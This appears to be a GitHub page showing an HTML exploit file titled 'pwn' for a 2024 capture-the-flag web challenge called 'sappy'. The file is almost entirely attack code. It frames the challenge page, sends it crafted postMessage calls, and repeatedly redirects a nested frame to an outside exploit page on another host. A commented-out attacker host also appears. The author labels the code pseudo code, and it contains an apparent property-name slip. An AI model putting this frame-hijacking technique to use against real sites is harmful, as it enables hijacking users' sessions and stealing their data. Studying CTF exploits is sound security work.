-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathindex.html
32 lines (29 loc) · 1.07 KB
/
index.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
<h1>pwn</h1>
<iframe id="idframe" src="https://sappy-web.2024.ctfcompetition.com/sap.html" onload=onloadpwn() sandbox="allow-scripts"></iframe>
<script>
//pseudo code
setTimeout(function(){ exp(); }, 6000);
function exp(){
//needs to modify this every 0.1s as it's not clear when the iframe of the iframe affected is created
setInterval(function(){
window.frames[0].frame[0][2].location="https://geekycat.in/exploit.html";
}, 100);
}
let pwn_url = "https://pwn.com";
function onloadpwn() {
console.log('onloading...');
let iframe = document.getElementById('idframe');
iframe.contentWindow.postMessage(
JSON.stringify({
"method": "initialize"
// "host": pwn_url
}),
'*');
// iframe.contentWindow.postMessage({"method": "render", "host": pwn_url},'*');
const msg = JSON.stringify({
method: "render",
page: "no-lowercase",
});
iframe.contentWindow.postMessage(msg, '*');
}
</script>